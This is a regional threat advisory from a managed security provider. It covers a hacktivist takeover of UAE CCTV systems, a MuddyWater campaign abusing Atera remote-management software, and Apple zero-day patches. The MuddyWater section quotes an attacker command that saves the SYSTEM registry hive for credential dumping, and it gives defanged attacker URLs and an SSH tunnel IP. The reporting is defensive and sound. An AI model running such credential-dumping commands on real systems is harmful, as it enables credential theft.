Threat advisories

Top Middle East Cyber Threats – December 3rd, 2024   

Dec-2024 2 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats. 

ShadowDefenders Hacktivist Group Exposes Vulnerabilities in UAE CCTV Systems

The ShadowDefenders hacktivist group has publicly claimed responsibility for hacking into CCTV systems in the UAE, asserting that they have gained full control over the compromised devices.

The group’s actions are reportedly driven by activism, targeting the UAE as part of their broader hacktivist agenda. These compromises highlight significant vulnerabilities and weak authentication in IoT devices, particularly CCTV systems, underscoring the urgent need for robust security measures.

The hacktivist group’s ability to control CCTV systems poses several risks:

Privacy Violations: Unauthorized access to sensitive camera feeds.

Operational Disruptions: Disabling or tampering with critical security infrastructure.

Reputation Damage: Public disclosure of compromised systems undermines trust in affected organizations.

Escalation Risks: Exploited devices could serve as entry points for further cyberattacks, such as DDoS attacks or data breaches

RECOMMENDATIONS 

Ensure all systems are patched and updated.

Replace passwords and implement strong authentication, including MFA where supported.

Restrict management access to authorized sources only.

Monitor your network for abnormal behavior and unauthorized access attempts, particularly from outside the country.

MuddyWater Campaign Exploits RMM Software for Post-Compromise Attacks.

Researchers have identified a campaign known as MuddyWater (tracked as STAC 1171 by Sophos). This campaign uses targeted phishing to distribute legitimate remote monitoring and management (RMM) software, Atera, as a foothold for post-compromise activities. Sophos has observed related activities targeting entities around the world.

The campaign begins with phishing emails directing victims to a document-sharing site, hxxps[://]ws[.]onehub[.]com/files/, to download a ZIP file named New Program ICC LTD.zip. This archive contains an installer for the Atera software. Once installed, the attackers leverage Atera’s remote commands to execute a PowerShell script designed to dump credentials and create a SYSTEM registry hive backup. Observed commands include: C:\WINDOWS\system32\reg.exe save HKLM\SYSTEM SystemBkup.hiv.

Post-compromise activities involve domain enumeration, establishing an SSH tunnel to 51.16.209[.]105, and downloading an additional RMM tool from hxxps[:]//downloads.level.io/install_windows.exe. This activity aligns with indicators and TTPs consistent with MuddyWater’s operations.

RECOMMENDATIONS 

Ensure all systems are patched and updated.

Avoid clicking on or opening untrusted or unknown links, files, or attachments.

Enforce a strong password policy and ensure the use of MFA.

Restrict VPN and RDP usage and monitor for suspicious connections.

Use RBAC and regularly audit privileged accounts.

Monitor your network for abnormal behaviors and IoCs.

Ensure frequent backups are in place.

Educate employees about detecting and reporting phishing or suspicious emails.

Apple Addresses Critical Zero-Day Vulnerabilities in macOS and iOS

Apple has released emergency security updates to address two zero-day vulnerabilities exploited in attacks on Intel-based Mac systems.

The vulnerabilities were identified in the macOS Sequoia JavaScriptCore (CVE-2024-44308) and WebKit (CVE-2024-44309) components of macOS. The JavaScriptCore vulnerability (CVE-2024-44308) allows attackers to achieve remote code execution through maliciously crafted web content, while the WebKit vulnerability (CVE-2024-44309) enables cross-site scripting attacks.

Apple has resolved these security flaws in macOS Sequoia 15.1.1. Since the affected components are also present in other Apple operating systems, the vulnerabilities have been patched in iOS 17.7.2, iPadOS 17.7.2, iOS 18.1.1, iPadOS 18.1.1, and visionOS 2.1.1.

RECOMMENDATIONS 